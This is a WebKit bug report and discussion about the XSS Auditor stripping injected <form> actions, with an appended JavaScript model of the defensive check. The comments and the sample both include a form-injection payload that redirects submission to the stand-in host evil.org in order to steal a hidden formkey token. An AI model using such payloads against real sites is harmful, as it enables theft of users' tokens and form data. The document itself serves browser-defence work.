Summary: | XSS Auditor : <form> action is blocked even if it is not a JavaScript URL | ||
---|---|---|---|
Product: | WebKit | Reporter: | prakash.1729 |
Component: | WebCore Misc. | Assignee: | Nobody <webkit-unassigned> |
Status: | RESOLVED WONTFIX | ||
Severity: | Normal | CC: | abarth, ap, dbates, tsepez |
Priority: | P2 | Keywords: | XSSAuditor |
Version: | 528+ (Nightly build) | ||
Hardware: | Unspecified | ||
OS: | Linux | ||
Description
prakash.1729
2011-11-17 01:18:33 PST
Yeah, we should only need to block JavaScript URLs. (This is a false positive, so not a security bug.)

Though it is a false positive according to the design, it is in fact protecting against <form> injection, which is good. It is the same with <iframe> injection, where the src attribute is removed even if the src is not a JavaScript URL. One more corner case is that an <iframe> from the same domain can be injected successfully. I assume this is a design decision.

P.S. I couldn't find an example in which detecting an injected form is a false positive.

Looking at this old XSSAuditor bug, I think that blocking form actions to off-domain http locations when a <form> is injected is the right thing to do (i.e. we need to block more than just the javascript URLs, as Adam suggests in Comment #1). Just so we're all on the same page, the case I'm considering (apologies if this is obvious) is when the page contains:

```html
<form action="http://good.com">
  <input type="text" name="quantity" value="2">
  <input type="hidden" name="formkey" value="91812727123812">
  <input type="submit">
</form>
```

and the "quantity" input element contains an injection, and we reflect from the URL, say:

    ...?quantity="></form><form action="http://evil.org">

resulting in the page:

```html
<form action="http://good.com">
  <input type="text" name="quantity" value=""></form><form action="http://evil.org">
  <input type="hidden" name="formkey" value="91812727123812">
  <input type="submit">
</form>
```

So when the user hits submit, we steal his formkey token (or other information from the input fields).

Please re-open if you disagree, or if you find that this is being triggered in the absence of both a reflected "<form" tag and a reflected "action" attribute. Thanks heaps.
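As an added example (not code from WebKit or from any commenter in this thread), the following JavaScript models the two-part check the closing comment argues for: a <form> action is neutralised only when the start tag was reflected from a query parameter of the request URL *and* the action is a javascript: URL or points off-origin. It goes slightly beyond the thread by applying the same-domain exemption noted above for <iframe> to forms as well. All function and constant names (`auditForms`, `SAMPLE_URL`, etc.) and the sample page are the example's own; the real XSS Auditor works on the HTML tokenizer's output rather than on regexes over the raw markup as done here.

```javascript
// Added example, not WebKit code: a toy model of the XSS Auditor heuristic
// discussed in the thread. For every <form> start tag in a response it asks
// (1) was this tag text reflected from a query parameter of the request URL,
// and (2) does its action point at a javascript: URL or at another origin?
// Only when both hold is the action attribute stripped. Names are assumed.

function canon(s) {
  // Collapse whitespace and lowercase so small re-serialisation differences
  // between the URL and the page do not defeat the comparison.
  return s.replace(/\s+/g, ' ').trim().toLowerCase();
}

function reflectedValues(requestUrl) {
  // Decoded query-string values: the only reflection source this toy models.
  return [...new URL(requestUrl).searchParams.values()].map(canon);
}

function originOf(href, base) {
  try { return new URL(href, base).origin; } catch (e) { return null; }
}

function auditForms(requestUrl, html) {
  const pageOrigin = new URL(requestUrl).origin;
  const reflected = reflectedValues(requestUrl);
  const blocked = []; // action values that were neutralised

  const cleaned = html.replace(/<form\b[^>]*>/gi, (tag) => {
    const m = /\baction\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i.exec(tag);
    if (!m) return tag; // no action attribute: nothing to block
    const action = m[1] ?? m[2] ?? m[3];

    // Condition (1): the start tag, up to and including the action attribute,
    // must appear inside a reflected query value. The page's own form
    // (good.com's) never matches, so it is left untouched.
    const tagPrefix = canon(tag.slice(0, m.index + m[0].length));
    if (!reflected.some((v) => v.includes(tagPrefix))) return tag;

    // Condition (2): javascript: URLs are always blocked; http(s) actions are
    // blocked only when they leave the page's origin (same-domain exemption,
    // as observed for injected <iframe>s in the thread).
    const isJavaScriptUrl = /^\s*javascript:/i.test(action);
    if (!isJavaScriptUrl && originOf(action, requestUrl) === pageOrigin) return tag;

    blocked.push(action);
    // Neutralise by dropping the attribute entirely (one possible choice).
    const stripped = tag.slice(0, m.index) + tag.slice(m.index + m[0].length);
    return stripped.replace(/\s+>$/, '>');
  });

  return { html: cleaned, blocked };
}

// Constructed sample reproducing the scenario in the thread: the reflected
// "quantity" value closes good.com's form and opens one pointing at evil.org.
const INJECTION = '"></form><form action="http://evil.org">';
const SAMPLE_URL = 'http://good.com/order?quantity=' + encodeURIComponent(INJECTION);
const SAMPLE_HTML = [
  '<form action="http://good.com">',
  '<input type="text" name="quantity" value=""></form><form action="http://evil.org">',
  '<input type="hidden" name="formkey" value="91812727123812">',
  '<input type="submit">',
  '</form>',
].join('\n');

const result = auditForms(SAMPLE_URL, SAMPLE_HTML);
console.log(result.blocked); // [ 'http://evil.org' ]
console.log(result.html);
```

Run with `node` to see that the injected evil.org form loses its action while good.com's own form is untouched. The reflection check is what keeps this from being a blanket "strip every off-origin action" rule: a page that legitimately posts to a third party is only affected if the attacker also controls a query parameter that echoes the tag into the markup.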